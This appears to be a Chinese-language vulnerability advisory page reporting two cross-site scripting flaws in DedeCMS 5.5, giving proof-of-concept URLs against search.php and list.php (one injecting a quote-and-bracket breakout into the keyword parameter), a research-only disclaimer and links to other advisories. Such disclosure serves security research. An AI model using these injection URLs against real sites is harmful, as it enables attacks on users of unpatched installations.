影响版本:
dedecms织梦5.5
漏洞描述:
demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&PageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&PageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2
【dedecms织梦 v5.5 两处跨站漏洞】相关文章:
★ Cisco Unified Communications 远程命令执行漏洞
★ Linux Kiss Server lks.c文件多个格式串处理漏洞
★ Cisco UCP CSuserCGI.exe缓冲溢出及跨站脚本漏洞
★ SurgeMail邮件服务器Page命令远程格式串处理漏洞
★ IBM Rational ClearQuest 跨站脚本漏洞